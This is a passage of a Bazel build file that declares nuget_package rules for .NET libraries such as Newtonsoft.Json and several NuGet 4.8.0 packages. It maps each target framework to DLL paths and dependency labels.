"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.runtime.extensions.dll",
],
"net462": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net462_system.runtime.extensions.dll",
],
"net47": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net47_system.runtime.extensions.dll",
],
"net471": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net471_system.runtime.extensions.dll",
],
"net472": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net472_system.runtime.extensions.dll",
],
},
mono_deps = [
"@io_bazel_rules_dotnet//dotnet/stdlib:system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.reflection.typeextensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.resources.resourcemanager.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.runtime.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib:system.runtime.extensions.dll",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
},
net_files = {
"net45": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net451": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net452": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net46": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net461": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net462": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net47": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net471": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"net472": [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
"netstandard1.5": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
"netstandard1.6": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
"netstandard2.0": [
"lib/netstandard1.5/CommandLine.dll",
"lib/netstandard1.5/CommandLine.xml",
],
},
mono_files = [
"lib/net45/CommandLine.dll",
"lib/net45/CommandLine.XML",
],
)
nuget_package(
name = "newtonsoft.json",
package = "newtonsoft.json",
version = "11.0.2",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Newtonsoft.Json.dll",
"netcoreapp2.1": "lib/netstandard2.0/Newtonsoft.Json.dll",
},
net_lib = {
"net45": "lib/net45/Newtonsoft.Json.dll",
"net451": "lib/net45/Newtonsoft.Json.dll",
"net452": "lib/net45/Newtonsoft.Json.dll",
"net46": "lib/net45/Newtonsoft.Json.dll",
"net461": "lib/net45/Newtonsoft.Json.dll",
"net462": "lib/net45/Newtonsoft.Json.dll",
"net47": "lib/net45/Newtonsoft.Json.dll",
"net471": "lib/net45/Newtonsoft.Json.dll",
"net472": "lib/net45/Newtonsoft.Json.dll",
"netstandard1.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.2": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.3": "lib/netstandard1.3/Newtonsoft.Json.dll",
"netstandard1.4": "lib/netstandard1.3/Newtonsoft.Json.dll",
"netstandard1.5": "lib/netstandard1.3/Newtonsoft.Json.dll",
"netstandard1.6": "lib/netstandard1.3/Newtonsoft.Json.dll",
"netstandard2.0": "lib/netstandard2.0/Newtonsoft.Json.dll",
},
mono_lib = "lib/net45/Newtonsoft.Json.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Newtonsoft.Json.dll",
"lib/netstandard2.0/Newtonsoft.Json.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Newtonsoft.Json.dll",
"lib/netstandard2.0/Newtonsoft.Json.xml",
],
},
net_files = {
"net45": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net451": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net452": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net46": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net461": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net462": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net47": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net471": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"net472": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
"netstandard1.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
],
"netstandard1.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
],
"netstandard1.2": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
],
"netstandard1.3": [
"lib/netstandard1.3/Newtonsoft.Json.dll",
"lib/netstandard1.3/Newtonsoft.Json.xml",
],
"netstandard1.4": [
"lib/netstandard1.3/Newtonsoft.Json.dll",
"lib/netstandard1.3/Newtonsoft.Json.xml",
],
"netstandard1.5": [
"lib/netstandard1.3/Newtonsoft.Json.dll",
"lib/netstandard1.3/Newtonsoft.Json.xml",
],
"netstandard1.6": [
"lib/netstandard1.3/Newtonsoft.Json.dll",
"lib/netstandard1.3/Newtonsoft.Json.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Newtonsoft.Json.dll",
"lib/netstandard2.0/Newtonsoft.Json.xml",
],
},
mono_files = [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
],
)
nuget_package(
name = "nuget.frameworks",
package = "nuget.frameworks",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Frameworks.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Frameworks.dll",
},
net_lib = {
"net45": "lib/net40/NuGet.Frameworks.dll",
"net451": "lib/net40/NuGet.Frameworks.dll",
"net452": "lib/net40/NuGet.Frameworks.dll",
"net46": "lib/net46/NuGet.Frameworks.dll",
"net461": "lib/net46/NuGet.Frameworks.dll",
"net462": "lib/net46/NuGet.Frameworks.dll",
"net47": "lib/net46/NuGet.Frameworks.dll",
"net471": "lib/net46/NuGet.Frameworks.dll",
"net472": "lib/net46/NuGet.Frameworks.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Frameworks.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Frameworks.dll",
},
mono_lib = "lib/net46/NuGet.Frameworks.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Frameworks.dll",
"lib/netstandard1.6/NuGet.Frameworks.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Frameworks.dll",
"lib/netstandard1.6/NuGet.Frameworks.xml",
],
},
net_files = {
"net45": [
"lib/net40/NuGet.Frameworks.dll",
"lib/net40/NuGet.Frameworks.xml",
],
"net451": [
"lib/net40/NuGet.Frameworks.dll",
"lib/net40/NuGet.Frameworks.xml",
],
"net452": [
"lib/net40/NuGet.Frameworks.dll",
"lib/net40/NuGet.Frameworks.xml",
],
"net46": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net461": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net462": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net47": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net471": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"net472": [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Frameworks.dll",
"lib/netstandard1.6/NuGet.Frameworks.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Frameworks.dll",
"lib/netstandard1.6/NuGet.Frameworks.xml",
],
},
mono_files = [
"lib/net46/NuGet.Frameworks.dll",
"lib/net46/NuGet.Frameworks.xml",
],
)
nuget_package(
name = "nuget.common",
package = "nuget.common",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Common.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Common.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Common.dll",
"net461": "lib/net46/NuGet.Common.dll",
"net462": "lib/net46/NuGet.Common.dll",
"net47": "lib/net46/NuGet.Common.dll",
"net471": "lib/net46/NuGet.Common.dll",
"net472": "lib/net46/NuGet.Common.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Common.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Common.dll",
},
mono_lib = "lib/net46/NuGet.Common.dll",
core_deps = {
"net46": [
"@nuget.frameworks//:net46_net",
],
"net461": [
"@nuget.frameworks//:net461_net",
],
"net462": [
"@nuget.frameworks//:net462_net",
],
"net47": [
"@nuget.frameworks//:net47_net",
],
"net471": [
"@nuget.frameworks//:net471_net",
],
"net472": [
"@nuget.frameworks//:net472_net",
],
"netstandard1.6": [
"@nuget.frameworks//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.frameworks//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.frameworks//:net46_net",
],
"net461": [
"@nuget.frameworks//:net461_net",
],
"net462": [
"@nuget.frameworks//:net462_net",
],
"net47": [
"@nuget.frameworks//:net47_net",
],
"net471": [
"@nuget.frameworks//:net471_net",
],
"net472": [
"@nuget.frameworks//:net472_net",
],
"netstandard1.6": [
"@nuget.frameworks//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.frameworks//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.frameworks//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Common.dll",
"lib/netstandard1.6/NuGet.Common.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Common.dll",
"lib/netstandard1.6/NuGet.Common.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net461": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net462": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net47": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net471": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"net472": [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Common.dll",
"lib/netstandard1.6/NuGet.Common.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Common.dll",
"lib/netstandard1.6/NuGet.Common.xml",
],
},
mono_files = [
"lib/net46/NuGet.Common.dll",
"lib/net46/NuGet.Common.xml",
],
)
nuget_package(
name = "nuget.configuration",
package = "nuget.configuration",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Configuration.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Configuration.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Configuration.dll",
"net461": "lib/net46/NuGet.Configuration.dll",
"net462": "lib/net46/NuGet.Configuration.dll",
"net47": "lib/net46/NuGet.Configuration.dll",
"net471": "lib/net46/NuGet.Configuration.dll",
"net472": "lib/net46/NuGet.Configuration.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Configuration.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Configuration.dll",
},
mono_lib = "lib/net46/NuGet.Configuration.dll",
core_deps = {
"net46": [
"@nuget.common//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.common//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.common//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Configuration.dll",
"lib/netstandard1.6/NuGet.Configuration.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Configuration.dll",
"lib/netstandard1.6/NuGet.Configuration.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net461": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net462": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net47": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net471": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"net472": [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Configuration.dll",
"lib/netstandard1.6/NuGet.Configuration.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Configuration.dll",
"lib/netstandard1.6/NuGet.Configuration.xml",
],
},
mono_files = [
"lib/net46/NuGet.Configuration.dll",
"lib/net46/NuGet.Configuration.xml",
],
)
nuget_package(
name = "nuget.versioning",
package = "nuget.versioning",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Versioning.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Versioning.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Versioning.dll",
"net461": "lib/net46/NuGet.Versioning.dll",
"net462": "lib/net46/NuGet.Versioning.dll",
"net47": "lib/net46/NuGet.Versioning.dll",
"net471": "lib/net46/NuGet.Versioning.dll",
"net472": "lib/net46/NuGet.Versioning.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Versioning.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Versioning.dll",
},
mono_lib = "lib/net46/NuGet.Versioning.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Versioning.dll",
"lib/netstandard1.6/NuGet.Versioning.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Versioning.dll",
"lib/netstandard1.6/NuGet.Versioning.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net461": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net462": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net47": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net471": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"net472": [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Versioning.dll",
"lib/netstandard1.6/NuGet.Versioning.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Versioning.dll",
"lib/netstandard1.6/NuGet.Versioning.xml",
],
},
mono_files = [
"lib/net46/NuGet.Versioning.dll",
"lib/net46/NuGet.Versioning.xml",
],
)
nuget_package(
name = "nuget.packaging.core",
package = "nuget.packaging.core",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Packaging.Core.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Packaging.Core.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Packaging.Core.dll",
"net461": "lib/net46/NuGet.Packaging.Core.dll",
"net462": "lib/net46/NuGet.Packaging.Core.dll",
"net47": "lib/net46/NuGet.Packaging.Core.dll",
"net471": "lib/net46/NuGet.Packaging.Core.dll",
"net472": "lib/net46/NuGet.Packaging.Core.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Packaging.Core.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Packaging.Core.dll",
},
mono_lib = "lib/net46/NuGet.Packaging.Core.dll",
core_deps = {
"net46": [
"@nuget.common//:net46_net",
"@nuget.versioning//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
"@nuget.versioning//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
"@nuget.versioning//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
"@nuget.versioning//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
"@nuget.versioning//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
"@nuget.versioning//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
"@nuget.versioning//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
"@nuget.versioning//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.common//:net46_net",
"@nuget.versioning//:net46_net",
],
"net461": [
"@nuget.common//:net461_net",
"@nuget.versioning//:net461_net",
],
"net462": [
"@nuget.common//:net462_net",
"@nuget.versioning//:net462_net",
],
"net47": [
"@nuget.common//:net47_net",
"@nuget.versioning//:net47_net",
],
"net471": [
"@nuget.common//:net471_net",
"@nuget.versioning//:net471_net",
],
"net472": [
"@nuget.common//:net472_net",
"@nuget.versioning//:net472_net",
],
"netstandard1.6": [
"@nuget.common//:netstandard1.6_net",
"@nuget.versioning//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.common//:netstandard2.0_net",
"@nuget.versioning//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.common//:mono",
"@nuget.versioning//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Packaging.Core.dll",
"lib/netstandard1.6/NuGet.Packaging.Core.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Packaging.Core.dll",
"lib/netstandard1.6/NuGet.Packaging.Core.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net461": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net462": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net47": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net471": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"net472": [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Packaging.Core.dll",
"lib/netstandard1.6/NuGet.Packaging.Core.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Packaging.Core.dll",
"lib/netstandard1.6/NuGet.Packaging.Core.xml",
],
},
mono_files = [
"lib/net46/NuGet.Packaging.Core.dll",
"lib/net46/NuGet.Packaging.Core.xml",
],
)
nuget_package(
name = "nuget.packaging",
package = "nuget.packaging",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Packaging.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Packaging.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Packaging.dll",
"net461": "lib/net46/NuGet.Packaging.dll",
"net462": "lib/net46/NuGet.Packaging.dll",
"net47": "lib/net46/NuGet.Packaging.dll",
"net471": "lib/net46/NuGet.Packaging.dll",
"net472": "lib/net46/NuGet.Packaging.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Packaging.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Packaging.dll",
},
mono_lib = "lib/net46/NuGet.Packaging.dll",
core_deps = {
"net46": [
"@nuget.packaging.core//:net46_net",
"@newtonsoft.json//:net46_net",
],
"net461": [
"@nuget.packaging.core//:net461_net",
"@newtonsoft.json//:net461_net",
],
"net462": [
"@nuget.packaging.core//:net462_net",
"@newtonsoft.json//:net462_net",
],
"net47": [
"@nuget.packaging.core//:net47_net",
"@newtonsoft.json//:net47_net",
],
"net471": [
"@nuget.packaging.core//:net471_net",
"@newtonsoft.json//:net471_net",
],
"net472": [
"@nuget.packaging.core//:net472_net",
"@newtonsoft.json//:net472_net",
],
"netstandard1.6": [
"@nuget.packaging.core//:netstandard1.6_net",
"@newtonsoft.json//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.packaging.core//:netstandard2.0_net",
"@newtonsoft.json//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.packaging.core//:net46_net",
"@newtonsoft.json//:net46_net",
],
"net461": [
"@nuget.packaging.core//:net461_net",
"@newtonsoft.json//:net461_net",
],
"net462": [
"@nuget.packaging.core//:net462_net",
"@newtonsoft.json//:net462_net",
],
"net47": [
"@nuget.packaging.core//:net47_net",
"@newtonsoft.json//:net47_net",
],
"net471": [
"@nuget.packaging.core//:net471_net",
"@newtonsoft.json//:net471_net",
],
"net472": [
"@nuget.packaging.core//:net472_net",
"@newtonsoft.json//:net472_net",
],
"netstandard1.6": [
"@nuget.packaging.core//:netstandard1.6_net",
"@newtonsoft.json//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.packaging.core//:netstandard2.0_net",
"@newtonsoft.json//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.packaging.core//:mono",
"@newtonsoft.json//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Packaging.dll",
"lib/netstandard1.6/NuGet.Packaging.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Packaging.dll",
"lib/netstandard1.6/NuGet.Packaging.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net461": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net462": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net47": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net471": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"net472": [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Packaging.dll",
"lib/netstandard1.6/NuGet.Packaging.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Packaging.dll",
"lib/netstandard1.6/NuGet.Packaging.xml",
],
},
mono_files = [
"lib/net46/NuGet.Packaging.dll",
"lib/net46/NuGet.Packaging.xml",
],
)
nuget_package(
name = "nuget.protocol",
package = "nuget.protocol",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Protocol.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Protocol.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Protocol.dll",
"net461": "lib/net46/NuGet.Protocol.dll",
"net462": "lib/net46/NuGet.Protocol.dll",
"net47": "lib/net46/NuGet.Protocol.dll",
"net471": "lib/net46/NuGet.Protocol.dll",
"net472": "lib/net46/NuGet.Protocol.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Protocol.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Protocol.dll",
},
mono_lib = "lib/net46/NuGet.Protocol.dll",
core_deps = {
"net46": [
"@nuget.configuration//:net46_net",
"@nuget.packaging//:net46_net",
],
"net461": [
"@nuget.configuration//:net461_net",
"@nuget.packaging//:net461_net",
],
"net462": [
"@nuget.configuration//:net462_net",
"@nuget.packaging//:net462_net",
],
"net47": [
"@nuget.configuration//:net47_net",
"@nuget.packaging//:net47_net",
],
